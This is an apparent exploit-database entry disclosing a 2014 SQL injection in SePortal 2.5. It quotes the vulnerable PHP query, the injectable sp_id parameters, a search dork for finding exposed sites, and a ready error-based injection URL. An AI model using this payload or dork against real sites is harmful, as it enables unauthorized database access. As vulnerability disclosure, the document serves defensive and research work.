header-logo
Suggest Exploit
vendor:
SePortal 2.5
by:
jsass
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: SePortal 2.5
Affected Version From: 2.5
Affected Version To: 2.5
Patch Exists: NO
Related CWE: N/A
CPE: a:seportal:seportal:2.5
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux Ubuntu 12.4 & Windows 7
2014

Exploit: SePortal 2.5 Sql Injection Vulnerabilty

An SQL injection vulnerability exists in SePortal 2.5, which allows an attacker to execute arbitrary SQL commands on the vulnerable system. The vulnerability is due to the application not properly sanitizing user-supplied input before using it in an SQL query. An attacker can exploit this vulnerability by sending a specially crafted request to the vulnerable application. This can allow the attacker to gain access to sensitive information in the database, modify data, or execute arbitrary commands on the underlying operating system.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL queries in a way that would allow an attacker to modify the logic of the executed query. Additionally, parameterized queries should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

####################################################################
Exploit: SePortal 2.5 Sql Injection Vulnerabilty
Author: jsass
Date  : 19\03\2014
Contact Twitter: @Kwsecurity
Script: http://www.seportal.org/
version: 2.5
Tested on: Linux Ubuntu 12.4 & Windows 7
Dork : "Powered by SePortal 2.5"

//** Searching And  Analysis By Kuwaity Crew **\\

####################################################################
      SQL INJECTION Vulnerabilty

       code :
 $main_template = 'staticpages';

define('GET_CACHES', 1);
define('ROOT_PATH', './');
define('GET_USER_ONLINE', 1);
define('GET_STATS_BOX', 1);
include(ROOT_PATH.'global.php');
require(ROOT_PATH.'includes/sessions.php');

  $sql = "SELECT *
          FROM ".STATICPAGE_TABLE."
          WHERE sp_id = '".$sp_id."'";
  $result = $site_db->query($sql);

      files:
  staticpages.php?sp_id=(inject here)
  print.php?mode=staticpage&client=printer&sp_id=(inject here)

example:

http://localhost/seportal2.5/staticpages.php?sp_id=1%27%20%20and+extractvalue%28rand%28%29,concat%280x7e,version%28%29%29%29--%20-

//////////////////////////////////////////////////////////////////////////////////
     
     
               
               
 Greats: dzkabyle & Mr.Exit & massacreur & rDNix & hamza & Q8 Spy & الشبح الدموي & medo medo & sec4ever.com & is-sec.com